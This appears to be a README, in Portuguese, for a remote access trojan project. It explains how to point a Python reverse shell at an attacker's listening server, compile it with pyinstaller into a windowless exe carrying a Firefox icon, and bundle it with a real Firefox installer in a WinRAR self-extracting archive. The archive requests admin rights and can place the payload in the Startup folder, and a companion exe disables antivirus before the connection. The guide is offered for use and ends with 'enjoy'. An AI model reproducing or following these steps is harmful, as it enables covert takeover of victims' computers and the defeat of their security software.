
Trojan de acesso remoto criado usando WinRar com instalador do Firefox e um Reverse Shell em Python embutido.
Trojan de acesso remoto criado usando WinRar com um instalador (ex. firefox) e um Reverse Shell em Python incorporado.
Edite o ficheiro client.py definindo o IP e a porta do servidor atacante em escuta e o IP e a porta de qualquer proxy presente na máquina de ataque. Se não houver um proxy, comente a secção correspondente.
Transforme o client.py em exe, usei o pyinstaller: pyinstaller -w -i "Firefox.ico" -F client.py. A opção -w permite criar um .exe sem janela, a opção -F permite criar apenas um ficheiro.
Crie um ZIP autoextraível com o WinRAR selecionando três ficheiros: um instalador benigno (ex: "firefox installer.exe"), client.exe e antivirus.exe. Nas definições do módulo autoextraível, defina a ordem de execução dos ficheiros, primeiro o instalador benigno e depois o client.exe; selecione a caixa de verificação para extrair os ficheiros numa pasta temporária ou, se quiser ser mais malicioso, especifique a pasta dos ficheiros que serão lançados no arranque (%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup). Ainda nas definições do módulo autoextraível, selecione solicitar acesso com direitos administrativos. O ficheiro antivirus.exe é um .exe sem janela que desativa o antivírus. Será lançado pelo client.exe antes de se conectar ao servidor.
O ficheiro antivirus.bat contém o código do ficheiro .exe homónimo e uma outra funcionalidade opcional. Usei o "Slimm bat to exe.exe" para converter o ficheiro .bat num ficheiro .exe sem janela.
Aproveite :)